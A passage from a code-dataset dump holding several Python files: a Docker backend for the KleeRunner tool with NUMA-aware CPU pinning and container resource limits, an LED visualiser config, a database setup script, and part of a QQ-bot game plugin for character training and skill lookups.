One or more params were None')\n import numa\n if not numa.available():\n raise Exception('NUMA not available')\n numa_nodes = list(range(0, numa.get_max_node() + 1))\n cpu_count = 0\n for numa_node in numa_nodes:\n cpus = numa.node_to_cpus(numa_node)\n for cpu_id in cpus:\n if cpu_id in self._available_cpu_ids:\n try:\n self._numa_nodes[numa_node].add(cpu_id)\n except KeyError:\n self._numa_nodes[numa_node] = set()\n self._numa_nodes[numa_node].add(cpu_id)\n try:\n self._numa_node_pool[numa_node].add(cpu_id)\n except KeyError:\n self._numa_node_pool[numa_node] = set()\n self._numa_node_pool[numa_node].add(cpu_id)\n _logger.info('Putting CPU {} in NUMA node {} in resource pool'.format(\n cpu_id, numa_node))\n cpu_count += 1\n else:\n _logger.info('CPU {} in NUMA node {} is NOT IN resource pool'.format(\n cpu_id, numa_node))\n\n if cpu_count == 0:\n raise Exception('Found no available CPUs')\n if cpu_count != len(self._available_cpu_ids):\n raise Exception(\n 'Mismatch between provided available CPU ids and what was found on system')\n assert len(self._numa_node_pool) == len(self._numa_nodes)\n\n def get_cpus(self):\n \"\"\"\n Returns a set of CPU ids for a single job\n \"\"\"\n with self._lock:\n self._lazy_cpu_and_mem_set_init()\n cpu_memset_tuples_to_return = set()\n if self._use_memset_of_nearest_node:\n for numa_node, available_cpus in sorted(\n self._numa_node_pool.items(), key=lambda x:x[0]):\n if len(available_cpus) >= self._cpus_per_job:\n for _ in range(0, self._cpus_per_job):\n cpu = available_cpus.pop()\n cpu_memset_tuples_to_return.add( (cpu, numa_node) )\n break # We are done\n else:\n # Grab any available CPU\n available_cpus = set(functools.reduce(\n lambda a,b: a.union(b),\n self._numa_node_pool.values()))\n cpus_to_grab = set()\n if len(available_cpus) >= self._cpus_per_job:\n for _ in range(0, self._cpus_per_job):\n cpus_to_grab.add(available_cpus.pop())\n # Now remove from pool\n for numa_node, available_cpus_in_node in sorted(\n self._numa_node_pool.items(), key=lambda x:x[0]):\n for cpu_to_grab in cpus_to_grab:\n if cpu_to_grab in available_cpus_in_node:\n cpu_memset_tuples_to_return.add( (cpu_to_grab, numa_node) )\n available_cpus_in_node.remove(cpu_to_grab)\n\n\n if len(cpu_memset_tuples_to_return) != self._cpus_per_job:\n _logger.error('Failed to retrieve CPU resources required for job')\n _logger.error('cpu_memset_tuples_to_return: {}'.format(cpu_memset_tuples_to_return))\n _logger.error('cpus_per_job: {}'.format(self._cpus_per_job))\n raise Exception('Failed to retrieve CPU resources required for job')\n return cpu_memset_tuples_to_return\n\n def release_cpus(self, cpu_ids):\n \"\"\"\n Returns a set of CPU ids\n \"\"\"\n with self._lock:\n self._lazy_cpu_and_mem_set_init()\n assert isinstance(cpu_ids, set)\n for item in cpu_ids:\n assert isinstance(item, int)\n for cpu_to_release in cpu_ids:\n released=False\n for numa_node, available_cpu_ids in self._numa_node_pool.items():\n if cpu_to_release in self._numa_nodes[numa_node]:\n available_cpu_ids.add(cpu_to_release)\n released = True\n break\n if not released:\n raise Exception('Failed to return CPU {} to pool'.format(cpu_to_release))\n\nclass DockerBackend(BackendBaseClass):\n\n def __init__(self, hostProgramPath, workingDirectory, timeLimit, memoryLimit, stackLimit, ctx, **kwargs):\n super().__init__(hostProgramPath, workingDirectory,\n timeLimit, memoryLimit, stackLimit, ctx, **kwargs)\n self._container = None\n self._workDirInsideContainer = '/mnt/'\n self._skipToolExistsCheck = False\n 
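ResourcePool above guards plain sets with one threading.Lock and raises when a pool runs dry. An alternative sketch built on queue.Queue, which makes callers block until a resource is returned instead of failing; the resource values are placeholders:

import queue

class BlockingPool:
    def __init__(self, resources):
        self._q = queue.Queue()
        for r in resources:
            self._q.put(r)

    def acquire(self, timeout=None):
        return self._q.get(timeout=timeout)  # blocks while the pool is empty

    def release(self, resource):
        self._q.put(resource)

pool = BlockingPool(['client-0', 'client-1'])
client = pool.acquire()
try:
    pass  # use the resource
finally:
    pool.release(client)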
self._userToUseInsideContainer = None\n self._dockerStatsOnExitShimBinary = None\n self._killLock = threading.Lock()\n self._additionalHostContainerFileMaps = dict()\n self._usedFileMapNames = set() # HACK\n self._extra_volume_mounts = dict()\n self._grabbed_cpus = None\n # handle required options\n if not 'image' in kwargs:\n raise DockerBackendException('\"image\" but be specified')\n self._dockerImageName = kwargs['image']\n if not (isinstance(self._dockerImageName, str) and len(self._dockerImageName) > 0):\n raise DockerBackendException('\"image\" must to a non empty string')\n\n # Pretend user default is $USER\n if not 'user' in kwargs:\n kwargs['user'] = '$HOST_USER'\n\n available_cpu_ids = None\n cpus_per_job = None\n self._use_memset_of_nearest_node = None\n self.resource_pinning = False # No resource pinning by default\n requiredOptions = ['image']\n # handle other options\n for key, value in kwargs.items():\n if key in requiredOptions:\n continue\n if key == 'skip_tool_check':\n self._skipToolExistsCheck = value\n if not isinstance(self._skipToolExistsCheck, bool):\n raise DockerBackendException(\n '\"skip_tool_check\" must map to a bool')\n continue\n if key == 'image_work_dir':\n self._workDirInsideContainer = value\n if not (isinstance(self._workDirInsideContainer, str) and len(self._workDirInsideContainer) > 0):\n raise DockerBackendException(\n '\"image_work_dir\" must be a non empty string')\n if not os.path.isabs(value):\n raise DockerBackendException(\n '\"image_work_dir\" must be an absolute path')\n continue\n if key == 'user':\n if not (isinstance(value, str) or isinstance(value, int) or value == None):\n raise DockerBackendException(\n '\"user\" must be integer or a string')\n if value == None:\n self._userToUseInsideContainer = None\n elif isinstance(value, int):\n if value < 0:\n raise DockerBackendException(\n '\"user\" specified as an integer must be >= 0')\n self._userToUseInsideContainer = value\n else:\n # The choice of $ is deliberate because it is not a valid\n # character in a username\n if value == \"$HOST_USER\":\n self._userToUseInsideContainer = \"{}:{}\".format(\n os.getuid(), os.getgid())\n else:\n import re\n if re.match(r'[a-z_][a-z0-9_-]*[$]?', value) == None:\n raise DockerBackendException(\n '\"{}\" is not a valid username'.format(value))\n self._userToUseInsideContainer = value\n continue\n if key == 'docker_stats_on_exit_shim':\n if not isinstance(value, bool):\n raise DockerBackendException(\n '\"docker_stats_on_exit_shim\" should be a boolean')\n if value:\n root = os.path.dirname(os.path.dirname(\n os.path.dirname(os.path.abspath(__file__))))\n self._dockerStatsOnExitShimBinary = os.path.join(\n root, 'external_deps', 'docker-stats-on-exit-shim')\n _logger.info(\"Looking for '{}'\".format(\n self._dockerStatsOnExitShimBinary))\n if not os.path.exists(self._dockerStatsOnExitShimBinary):\n raise DockerBackendException(\n \"Could not find docker-stats-on-exit-shim at '{}'\".format(self._dockerStatsOnExitShimBinary))\n continue\n if key == 'extra_mounts':\n if not isinstance(value, dict):\n raise DockerBackendException(\n '\"extra_mounts\" should be a dictionary')\n for host_path, props in value.items():\n if not isinstance(host_path, str):\n raise DockerBackendException(\n '\"extra_mounts\" keys should be a string')\n if not os.path.isabs(host_path):\n raise DockerBackendException(\n '\"host_path\" (\"{}\") must be an absolute path'.format(\n host_path))\n if not isinstance(props, dict):\n raise DockerBackendException(\n '\"{}\" should map to a 
dictionary'.format(\n                            host_path))\n                    in_container_path = None\n                    read_only = True\n                    try:\n                        in_container_path = props['container_path']\n                    except KeyError:\n                        raise DockerBackendException('\"container_path\" key is missing from {}'.format(props))\n                    if 'read_only' in props:\n                        read_only = props['read_only']\n                        if not isinstance(read_only, bool):\n                            raise DockerBackendException('\"read_only\" must be a boolean')\n                    if not os.path.isabs(in_container_path):\n                        raise DockerBackendException(\n                            'Container mount point \"{}\" should be absolute'.format(\n                                in_container_path))\n                    if in_container_path.startswith(self._workDirInsideContainer):\n                        raise DockerBackendException(\n                            'Container mount point \"{}\" cannot be based in \"{}\"'.format(\n                                in_container_path,\n                                self._workDirInsideContainer))\n                    self._extra_volume_mounts[host_path] = {\n                        'bind': in_container_path,\n                        'ro': read_only,\n                    }\n                continue\n            if key == 'resource_pinning':\n                self.resource_pinning = True\n                if not isinstance(value, dict):\n                    raise DockerBackendException(\n                        'resource_pinning should map to a dictionary')\n                if 'cpu_ids' not in value:\n                    raise DockerBackendException(\n                        'cpu_ids key must be present in resource_pinning')\n                available_cpu_ids = value['cpu_ids']\n                if not isinstance(available_cpu_ids, list):\n                    raise DockerBackendException(\n                        'cpu_ids must be a list')\n                # Turn into a set\n                available_cpu_ids = set(available_cpu_ids)\n                if len(available_cpu_ids) == 0:\n                    raise DockerBackendException(\n                        'cpu_ids must not be empty')\n                if 'cpus_per_job' not in value:\n                    raise DockerBackendException(\n                        'cpus_per_job key must be present in resource_pinning')\n                cpus_per_job = value['cpus_per_job']\n                if not isinstance(cpus_per_job, int):\n                    raise DockerBackendException(\n                        'cpus_per_job must be an integer')\n                if cpus_per_job < 1:\n                    raise DockerBackendException(\n                        'cpus_per_job must be >= 1')\n                self._use_memset_of_nearest_node = False # Default\n                if 'use_memset_of_nearest_node' in value:\n                    self._use_memset_of_nearest_node = value['use_memset_of_nearest_node']\n                    if not isinstance(self._use_memset_of_nearest_node, bool):\n                        raise DockerBackendException(\n                            'use_memset_of_nearest_node must be a boolean')\n                # Sanity check\n                if (self.ctx.num_parallel_jobs * cpus_per_job) > len(available_cpu_ids):\n                    raise DockerBackendException(\n                        'Number of cpus required exceeds number of available CPUs')\n                continue\n\n            # Not recognised option\n            raise DockerBackendException(\n                '\"{}\" key is not a recognised option'.format(key))\n\n        # HACK: Try to prevent program path name being used in calls to addFileToBackend()\n        if self.programPath().startswith('/tmp') and os.path.dirname(self.programPath()) == '/tmp':\n            self._usedFileMapNames.add(os.path.basename(self.programPath()))\n\n        # Initialise global client pool. This is shared among all runners.\n        self._resource_pool = None\n        try:\n            self._resource_pool, success = self.ctx.get_object('DockerBackend.ResourcePool')\n            if not success:\n                # There is no existing resource pool. Make one\n                self._resource_pool = ResourcePool(\n                    num_jobs=self.ctx.num_parallel_jobs,\n                    available_cpu_ids=available_cpu_ids,\n                    cpus_per_job=cpus_per_job,\n                    use_memset_of_nearest_node=self._use_memset_of_nearest_node\n                )\n                success = self.ctx.add_object('DockerBackend.ResourcePool', self._resource_pool)\n                # Handle race. 
If someone managed to make a resource pool before we did\n # use theirs instead\n if not success:\n self._resource_pool, success = self.ctx.get_object('DockerBackend.ResourcePool')\n if not success:\n raise DockerBackendException('Failed to setup resource pool')\n except Exception as e:\n _logger.error('Failed to get resource pool')\n _logger.error(e)\n raise DockerBackendException(\n 'Failed to get resource pool')\n\n # Initialise the docker client\n try:\n self._dc = self._resource_pool.get_docker_client()\n self._dc.ping()\n except Exception as e:\n _logger.error('Failed to connect to the Docker daemon')\n _logger.error(e)\n raise DockerBackendException(\n 'Failed to connect to the Docker daemon')\n\n try:\n # FIXME: Move this check into the resource pool so we can cache\n # the result of this check among runners.\n # Check we can find the docker image\n images = self._dc.images()\n assert isinstance(images, list)\n images = list(\n filter(lambda i: (i['RepoTags'] is not None) and self._dockerImageName in i['RepoTags'], images))\n if len(images) == 0:\n msg = 'Could not find docker image with name \"{}\"'.format(\n self._dockerImageName)\n raise DockerBackendException(msg)\n else:\n if len(images) > 1:\n msg = 'Found multiple docker images:\\n{}'.format(\n pprint.pformat(images))\n _logger.error(msg)\n raise DockerBackendException(msg)\n self._dockerImage = images[0]\n _logger.debug('Found Docker image:\\n{}'.format(\n pprint.pformat(self._dockerImage)))\n finally:\n # HACK: To not exhaust the resource pool we need to\n # return the client now.\n self._resource_pool.release_docker_client(self._dc)\n self._dc = None\n\n @property\n def name(self):\n return \"Docker\"\n\n @property\n def dockerStatsOnExitShimPathInContainer(self):\n if self._dockerStatsOnExitShimBinary == None:\n return None\n return self.getFilePathInBackend(self._dockerStatsOnExitShimBinary)\n\n @property\n def dockerStatsLogFileName(self):\n return 'exit_stats.json'\n\n @property\n def dockerStatsLogFileHost(self):\n return os.path.join(self.workingDirectory, self.dockerStatsLogFileName)\n\n @property\n def dockerStatsLogFileInContainer(self):\n return os.path.join(self.workingDirectoryInternal, self.dockerStatsLogFileName)\n\n def run(self, cmdLine, logFilePath, envVars):\n # Grab a docker client\n self._dc = self._resource_pool.get_docker_client()\n\n self._logFilePath = logFilePath\n self._outOfMemory = False\n outOfTime = False\n ulimits = []\n if self.stackLimit != None:\n # FIXME: Setting stack size in Docker seems broken right now.\n # See: https://github.com/docker/docker/issues/13521\n _logger.warning(\n \"Setting stack size is probably broken. If you get crashes don't set it!\")\n stackLimitInBytes = 0\n if self.stackLimit == 0:\n # Work out the maximum memory size, docker doesn't support\n # \"unlimited\" right now\n _logger.warning(\n \"Trying to emulate unlimited stack. Docker doesn't support setting it\")\n if self.memoryLimit > 0:\n # If a memory limit is set just set the stack size to the maximum we allow\n # self.memoryLimit is in MiB, convert to bytes\n stackLimitInBytes = self.memoryLimit * (2**20)\n else:\n # No memory limit is set. Just use the amount of memory on system as an\n # upper bound\n stackLimitInBytes = psutil.virtual_memory().total + psutil.swap_memory().total\n elif self.stackLimit > 0:\n stackLimitInBytes = self.stackLimit * 1024\n # I'm assuming the stack limit is set in bytes here.
I don't actually know if\n # this is the case.\n ulimits.append(docker.utils.Ulimit(name='stack',\n soft=stackLimitInBytes,\n hard=stackLimitInBytes))\n _logger.info(\n 'Setting stack size limit to {} bytes'.format(stackLimitInBytes))\n\n extraHostCfgArgs = {}\n if len(ulimits) > 0:\n extraHostCfgArgs['ulimits'] = ulimits\n\n # Declare the volumes\n programPathInsideContainer = self.programPath()\n bindings = dict()\n\n if self._dockerStatsOnExitShimBinary:\n self.addFileToBackend(self._dockerStatsOnExitShimBinary, read_only=True)\n\n # Add additional volumes\n for hostPath, (containerPath, read_only) in self._additionalHostContainerFileMaps.items():\n bindings[hostPath] = {'bind': containerPath, 'ro': read_only}\n\n # Try adding extra volumes\n for hostPath, props in self._extra_volume_mounts.items():\n bindings[hostPath] = props\n\n # Mandatory bindings\n bindings[self.workingDirectory] = {\n 'bind': self.workingDirectoryInternal, 'ro': False}\n bindings[self.hostProgramPath] = {\n 'bind': programPathInsideContainer, 'ro': True}\n\n _logger.debug('Declaring bindings:\\n{}'.format(\n pprint.pformat(bindings)))\n\n extraContainerArgs = {}\n\n if self.memoryLimit > 0:\n # http://docs.docker.com/reference/run/#memory-constraints\n #\n # memory=L= 0\n mem_set_to_use_str=str(mem_set_to_use)\n _logger.warning('FIXME Setting cpuset_mem is broken')\n raise Exception('Setting cpuset_mem is broken')\n # FIXME: Need to get this PR ( https://github.com/docker/docker-py/pull/1583 )\n # accepted for this to work.\n # extraHostCfgArgs['cpuset_mems'] = mem_set_to_use_str\n\n\n hostCfg = self._dc.create_host_config(\n binds=bindings,\n privileged=False,\n network_mode=None,\n **extraHostCfgArgs\n )\n\n # Modify the command line if necessary\n finalCmdLine = cmdLine\n if self._dockerStatsOnExitShimBinary:\n finalCmdLine = [self.dockerStatsOnExitShimPathInContainer,\n self.dockerStatsLogFileInContainer] + finalCmdLine\n _logger.debug('Command line inside container:\\n{}'.format(\n pprint.pformat(finalCmdLine)))\n\n # Finally create the container\n self._container = self._dc.create_container(\n image=self._dockerImage['Id'],\n command=finalCmdLine,\n environment=envVars,\n working_dir=self.workingDirectoryInternal,\n volumes=list(bindings.keys()),\n host_config=hostCfg,\n # The default. When all containers are created this way they will all\n # get the same proportion of CPU cycles.\n cpu_shares=0,\n **extraContainerArgs\n )\n _logger.debug('Created container:\\n{}'.format(\n pprint.pformat(self._container['Id'])))\n if self._container['Warnings'] != None:\n _logger.warning('Warnings emitted when creating container:{}'.format(\n self._container['Warnings']))\n\n exitCode = None\n startTime = time.perf_counter()\n self._endTime = 0\n try:\n self._dc.start(container=self._container['Id'])\n timeoutArg = {}\n if self.timeLimit > 0:\n timeoutArg['timeout'] = self.timeLimit\n _logger.info('Using timeout {} seconds'.format(self.timeLimit))\n exitCode = self._dc.wait(\n container=self._container['Id'], **timeoutArg)\n if exitCode == -1:\n # FIXME: Does this even happen?
Docker-py's documentation is\n # unclear.\n outOfTime = True\n _logger.info('Timeout occurred')\n exitCode = None\n except requests.exceptions.ReadTimeout as e:\n _logger.info('Timeout occurred')\n outOfTime = True\n except docker.errors.NotFound as e:\n _logger.error(\n 'Failed to start/wait on container \"{}\".\\nReason: {}'.format(self._container['Id'], str(e)))\n finally:\n self.kill()\n\n runTime = self._endTime - startTime\n userCPUTime = None\n sysCPUTime = None\n\n if self._dockerStatsOnExitShimBinary:\n # Try to extract the needed stats\n try:\n with open(self.dockerStatsLogFileHost, 'r') as f:\n stats = json.load(f)\n userCPUTime = float(stats['cgroups']['cpu_stats']['cpu_usage'][\n 'usage_in_usermode']) / (10**9)\n sysCPUTime = float(stats['cgroups']['cpu_stats']['cpu_usage'][\n 'usage_in_kernelmode']) / (10**9)\n except Exception as e:\n _logger.error('Failed to retrieve stats from \"{}\"'.format(\n self.dockerStatsLogFileHost))\n _logger.error(str(e))\n _logger.error(traceback.format_exc())\n\n return BackendResult(exitCode=exitCode,\n runTime=runTime,\n oot=outOfTime,\n oom=self._outOfMemory,\n userCpuTime=userCPUTime,\n sysCpuTime=sysCPUTime)\n\n def kill(self):\n try:\n self._killLock.acquire()\n self._endTime = time.perf_counter()\n if self._container != None:\n _logger.info('Stopping container:{}'.format(\n self._container['Id']))\n try:\n containerStatus = self._dc.inspect_container(\n self._container['Id'])\n if containerStatus[\"State\"][\"Running\"]:\n self._dc.kill(self._container['Id'])\n except docker.errors.APIError as e:\n _logger.error('Failed to kill container:\"{}\".\\n{}'.format(\n self._container['Id'], str(e)))\n\n # Write logs to file (note we get binary in Python 3, not sure\n # about Python 2)\n with open(self._logFilePath, 'wb') as f:\n logData = self._dc.logs(container=self._container['Id'],\n stdout=True, stderr=True, timestamps=False,\n tail='all', stream=False)\n _logger.info('Writing log to {}'.format(self._logFilePath))\n f.write(logData)\n\n # Record if OOM occurred\n containerInfo = self._dc.inspect_container(\n container=self._container['Id'])\n self._outOfMemory = containerInfo['State']['OOMKilled']\n assert isinstance(self._outOfMemory, bool)\n\n try:\n _logger.info('Destroying container:{}'.format(\n self._container['Id']))\n # Note setting `v=True` is very important. This removes\n # the volumes associated with the container. 
Otherwise\n # we'll leave loads of stray volumes lying around.\n self._dc.remove_container(\n container=self._container['Id'], v=True, force=True)\n except docker.errors.APIError as e:\n _logger.error('Failed to remove container:\"{}\".\\n{}'.format(\n self._container['Id'], str(e)))\n self._container = None\n finally:\n if self._dc is not None:\n self._resource_pool.release_docker_client(self._dc)\n self._dc = None\n if self.resource_pinning and self._grabbed_cpus is not None:\n self._resource_pool.release_cpus(self._grabbed_cpus)\n self._grabbed_cpus = None\n self._killLock.release()\n\n def programPath(self):\n return '/tmp/{}'.format(os.path.basename(self.hostProgramPath))\n\n def checkToolExists(self, toolPath):\n if self._skipToolExistsCheck:\n _logger.info('Skipping tool check')\n return\n assert os.path.isabs(toolPath)\n # HACK: Is there a better way to do this?\n _logger.debug('Checking tool \"{}\" exists in image'.format(toolPath))\n tempContainer = self._dc.create_container(image=self._dockerImage['Id'],\n command=['ls', toolPath])\n _logger.debug('Created temporary container: {}'.format(\n tempContainer['Id']))\n self._dc.start(container=tempContainer['Id'])\n exitCode = self._dc.wait(container=tempContainer['Id'])\n self._dc.remove_container(container=tempContainer['Id'], force=True)\n if exitCode != 0:\n raise DockerBackendException(\n 'Tool \"{}\" does not exist in Docker image'.format(toolPath))\n\n @property\n def workingDirectoryInternal(self):\n # Return the path to the working directory that will be used inside the\n # container\n return self._workDirInsideContainer\n\n def addFileToBackend(self, path, read_only):\n if not os.path.isabs(path):\n raise DockerBackendException('path must be absolute')\n fileName = os.path.basename(path)\n\n if not os.path.exists(path):\n raise DockerBackendException(\n 'File \"{}\" does not exist'.format(path))\n\n if not isinstance(read_only, bool):\n raise DockerBackendException('\"read_only\" must be boolean')\n\n # FIXME: This mapping is lame. We could do something more sophisticated\n # to avoid this limitation.\n if fileName in self._usedFileMapNames:\n raise DockerBackendException(\n 'Mapping identically named file is not supported')\n self._additionalHostContainerFileMaps[\n path] = (os.path.join('/tmp', fileName), read_only)\n _logger.debug('Adding mapping \"{}\" => \"{}\"'.format(\n path,\n self._additionalHostContainerFileMaps[path])\n )\n for _, props in self._extra_volume_mounts.items():\n if self._additionalHostContainerFileMaps[path][0] == props['bind']:\n raise DockerBackendException(\n 'Cannot add path \"{}\".
It is already in use by \"{}\"'.format(\n path, self._extra_volume_mounts))\n self._usedFileMapNames.add(fileName)\n\n def getFilePathInBackend(self, hostPath):\n try:\n file_path, _ = self._additionalHostContainerFileMaps[hostPath]\n return file_path\n except KeyError as e:\n raise DockerBackendException(\n '\"{}\" was not given to addFileToBackend()'.format(hostPath))\n\n\ndef get():\n return DockerBackend\n","sub_path":"KleeRunner/Backends/Docker.py","file_name":"Docker.py","file_ext":"py","file_size_in_byte":35433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"97389113","text":"from __future__ import print_function\nfrom __future__ import division\nimport os\n\nLED_PIN = 18\n\nLED_FREQ_HZ = 800000\n\nLED_DMA = 5\n\nBRIGHTNESS = 255\n\nLED_INVERT = False\n\nSOFTWARE_GAMMA_CORRECTION = True\n\nN_PIXELS = 150\n\nGAMMA_TABLE_PATH = os.path.join(os.path.dirname(__file__), 'gamma_table.npy')\n\nMIC_RATE = 48000\n\nFPS = 50\n\n_max_led_FPS = int(((N_PIXELS * 30e-6) + 50e-6)**-1.0)\nassert FPS <= _max_led_FPS, 'FPS must be <= {}'.format(_max_led_FPS)\n\nMIN_FREQUENCY = 200\n\nMAX_FREQUENCY = 12000\n\nN_FFT_BINS = 24\n\nN_ROLLING_HISTORY = 2\n\nMIN_VOLUME_THRESHOLD = 1e-7\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"422513912","text":"#!/usr/bin/env python\n# encoding=utf-8\n# Autor: Fadiga\n\nfrom models import (Group, Operator, PhoneNumber, Contact,\n ContactGroup, Transfer, Settings)\n\n\ndef setup(drop_tables=False):\n \"\"\" create tables if not exist \"\"\"\n\n did_create = False\n\n for models in [Group, Operator, Contact, PhoneNumber,\n ContactGroup, Transfer, Settings]:\n if drop_tables:\n models.drop_table()\n if not models.table_exists():\n models.create_table()\n did_create = True\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"70244735","text":"import asyncio\nimport re\nimport time\n\nimport nonebot\nimport pytz\n\nfrom hoshino.typing import CQEvent\nfrom . 
import sv\nfrom .ScoreCounter import ScoreCounter2\nfrom .duelconfig import *\n\n\n@sv.on_fullmatch(['培养帮助'])\nasync def gift_help(bot, ev: CQEvent):\n msg = '''\n╔ ╗ \n 培养帮助\n[技能一览] [性格一览]\n[查技能]{技能名}\n[查性格]{性格名}\n[修炼查询]\n[挂机修炼]{女友名}\n[结束修炼]\n[提升rank]{角色名}\n[角色升星] {角色名}\n╚ ╝\n '''\n await bot.send(ev, msg)\n\n\n@sv.on_prefix(['查性格'])\nasync def xiulian_start(bot, ev: CQEvent):\n args = ev.message.extract_plain_text().split()\n if len(args) != 1:\n await bot.finish(ev, '请输入 查性格+性格名称 。', at_sender=True)\n name = args[0]\n if not character.get(name):\n await bot.finish(ev, f'未查询到名为\"{name}\"的性格', at_sender=True)\n msg = f'''\n{name}:\n{character[name]}\n '''.strip()\n await bot.send(ev, '\\n' + msg, at_sender=True)\n\nxingge_li = []\nfor i in character.keys():\n xingge_li.append(f'''\n{i}:\n{character[i]}\n '''.strip())\nxingge_all = '\\n\\n'.join(xingge_li)\n\nfrom hoshino.util.image_utils import CreateImg\nxingge_img = CreateImg(900, 2800, font_size=38)\nxingge_img.text((10, 10), xingge_all)\nxingge_img.save(R.img(\"ghs/cache/xingge_all.png\").path)\n\n@sv.on_fullmatch(['性格列表', '性格一览'])\nasync def skill_li(bot, ev: CQEvent):\n await bot.send(ev, R.img(\"ghs/cache/xingge_all.png\").cqcode)\n\n\n@sv.on_prefix(['查技能'])\nasync def xiulian_start(bot, ev: CQEvent):\n args = ev.message.extract_plain_text().split()\n if len(args) != 1:\n await bot.finish(ev, '请输入 查技能+性格名称 。', at_sender=True)\n name = args[0]\n if not skill_def_json.get(name):\n await bot.finish(ev, f'未查询到名为\"{name}\"的技能', at_sender=True)\n cost_msg = ''\n if skill_def_json[name].get('cost'):\n cost_msg = f\"\\n触发消耗sp:{skill_def_json[name].get('cost')}\"\n msg = f'''\n{name}:\n发动消耗sp:{skill_def_json[name]['sp']}{cost_msg}\n{skill_def_json[name]['desc']}\n '''.strip()\n await bot.send(ev, '\\n' + msg, at_sender=True)\n\n\n@sv.on_fullmatch([\"技能列表\", \"技能一览\"])\nasync def skill_li(bot, ev: CQEvent):\n tas_list = []\n data = {\n \"type\": \"node\",\n \"data\": {\n \"name\": \"ご主人様\",\n \"uin\": \"1587640710\",\n \"content\": \"====== 技能列表 ======\"\n }\n }\n tas_list.append(data)\n t = list(skill_def_json.keys())\n step = 5\n b = [t[i:i + step] for i in range(0, len(t), step)]\n for x in b:\n msgli = []\n for i in x:\n cost_msg = ''\n if skill_def_json[i].get('cost'):\n cost_msg = f\"\\n触发消耗sp:{skill_def_json[i].get('cost')}\"\n msg = f'''{i}:\n发动消耗sp:{skill_def_json[i]['sp']}{cost_msg}\n{skill_def_json[i]['desc']}'''.strip()\n msgli.append(msg)\n data = {\n \"type\": \"node\",\n \"data\": {\n \"name\": \"ご主人様\",\n \"uin\": \"1587640710\",\n \"content\": \"\\n\\n\".join(msgli)\n }\n }\n tas_list.append(data)\n await bot.send_group_forward_msg(group_id=ev['group_id'], messages=tas_list)\n\n\n@sv.on_fullmatch(['修炼查询'])\nasync def my_fragment_list(bot, ev: CQEvent):\n gid = ev.group_id\n uid = ev.user_id\n duel = DuelCounter()\n CE = CECounter()\n if duel._get_level(gid, uid) == 0:\n msg = '您还未在本群创建过角色,请发送 创建角色 开始你的人生旅途。'\n await bot.send(ev, msg, at_sender=True)\n return\n equip_list = CE._get_fragment_list(gid, uid)\n cids = duel._get_cards(gid, uid)\n if len(equip_list) > 0:\n msg_list = '修炼列表:'\n for i in equip_list:\n if i[0] == 0 or i[0] not in cids:\n continue\n else:\n c = chara.fromid(i[0])\n name = c.name\n msg_list = msg_list + f\"\\n{name}:{i[1]}\"\n await bot.send(ev, msg_list, at_sender=True)\n else:\n await bot.finish(ev, '您还没有挂机修炼过角色', at_sender=True)\n\n\n@sv.on_prefix(['挂机修炼', '开始挂机'])\nasync def xiulian_start(bot, ev: CQEvent):\n args = ev.message.extract_plain_text().split()\n gid = ev.group_id\n uid = ev.user_id\n if 
len(args) != 1:\n await bot.finish(ev, '请输入 挂机修炼+女友名 中间用空格隔开。', at_sender=True)\n name = args[0]\n cid = chara.name2id(name)\n if cid == 1000:\n await bot.send(ev, '请输入正确的角色名。', at_sender=True)\n return\n duel = DuelCounter()\n CE = CECounter()\n c = chara.fromid(cid)\n nvmes = get_nv_icon(cid)\n up_info = duel._get_fashionup(gid, uid, cid, 0)\n if up_info:\n fashion_info = get_fashion_info(up_info)\n nvmes = fashion_info['icon']\n owner = duel._get_card_owner(gid, cid)\n\n if uid != owner:\n msg = f'{c.name}现在正在\\n[CQ:at,qq={owner}]的身边哦,您无法绑定哦。'\n await bot.send(ev, msg)\n return\n if owner == 0:\n await bot.send(ev, f'{c.name}现在还是单身哦,快去约到她吧。{nvmes}', at_sender=True)\n return\n guajiinfo = CE._get_xiulian(gid, uid)\n if guajiinfo[0] > 0:\n cgj = chara.fromid(guajiinfo[0])\n nvmesgj = get_nv_icon(guajiinfo[0])\n up_info = duel._get_fashionup(gid, uid, guajiinfo[0], 0)\n if up_info:\n fashion_info = get_fashion_info(up_info)\n nvmesgj = fashion_info['icon']\n await bot.finish(ev, f'{cgj.name}已经在修炼中了哦。{nvmesgj}', at_sender=True)\n if uid == owner:\n xltime = time.time()\n xltime = math.ceil(xltime)\n CE._add_xiulian(gid, uid, cid, xltime)\n await bot.send(ev, f'您的女友{c.name}开始修炼了\\n注:一次性修炼最长不能超过24小时哦。{nvmes}', at_sender=True)\n\n\n@sv.on_fullmatch(['结束修炼', '取消修炼'])\nasync def xiulian_end(bot, ev: CQEvent):\n gid = ev.group_id\n uid = ev.user_id\n CE = CECounter()\n guajiinfo = CE._get_xiulian(gid, uid)\n if guajiinfo[0] == 0:\n await bot.finish(ev, f'您没有正在修炼中的女友,请输入 挂机修炼+女友名 开始修炼哦。', at_sender=True)\n cid = guajiinfo[0]\n endtime = time.time()\n endtime = math.ceil(endtime)\n jgtime = endtime - guajiinfo[1]\n if jgtime < 3600:\n CE._delete_xiulian(gid, uid)\n await bot.finish(ev, f'修炼结束,修炼时间小于1小时,无法获得修炼度。', at_sender=True)\n sj_msg = ''\n count = check_build_counter(gid, uid, BuildModel.KONGFU)\n if count < 2:\n if jgtime > 86400:\n xlmin1 = math.floor(jgtime / 60)\n sj_msg = sj_msg + f\"总共修炼时间{xlmin1}分钟,由于超过24小时,实际\"\n jgtime = 86400\n xlmin = math.ceil(jgtime / 3600)\n sj_msg = sj_msg + f\"修炼时间为{xlmin}小时,\"\n qinfen_flag = check_have_character(guajiinfo[0], \"勤奋\")\n if qinfen_flag:\n xlmin = int(xlmin * 1.5)\n CE._add_fragment_num(gid, uid, cid, xlmin)\n ex_msg = ''\n if count > 0:\n addexp = xlmin * GJ_EXP_RATE * count\n add_exp(gid, uid, guajiinfo[0], addexp)\n ex_msg += f\"受到道馆的影响额外增加了{addexp}点经验\"\n CE._delete_xiulian(gid, uid)\n c = chara.fromid(guajiinfo[0])\n nvmes = get_nv_icon(guajiinfo[0])\n duel = DuelCounter()\n up_info = duel._get_fashionup(gid, uid, guajiinfo[0], 0)\n if up_info:\n fashion_info = 